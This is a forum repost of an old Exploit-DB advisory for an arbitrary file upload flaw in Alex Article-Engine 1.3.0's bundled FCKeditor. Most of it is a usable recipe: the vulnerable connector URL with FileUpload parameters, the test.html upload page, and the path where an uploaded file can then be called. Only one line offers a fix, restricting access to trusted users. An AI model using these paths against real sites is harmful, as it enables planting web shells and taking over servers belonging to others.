Exploit Alex Article-Engine 1.3.0 - 'FCKeditor' Arbitrary File Upload

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7158
Проверка EDB
  1. Пройдено
Автор
BATTER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2008-11-19
Код:
########################################################################
#
#                        Yellow Flood Organization
#
# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/article-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
#
# Discover by: Batter
#
########################################################################



####################
- Vulnerability:
####################

/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?

Command=FileUpload&Type=File&CurrentFolder=/

####################
- Exploit:
####################

http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html

####################
- how To use:
####################

http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*

####################
- Solution:
####################

Restrict and grant only trusted users access to the resources.

####################
- Greets :
####################

THE.HACKER.ONE , Str0ke

####################

# milw0rm.com [2008-11-19]
 
Источник
www.exploit-db.com

Похожие темы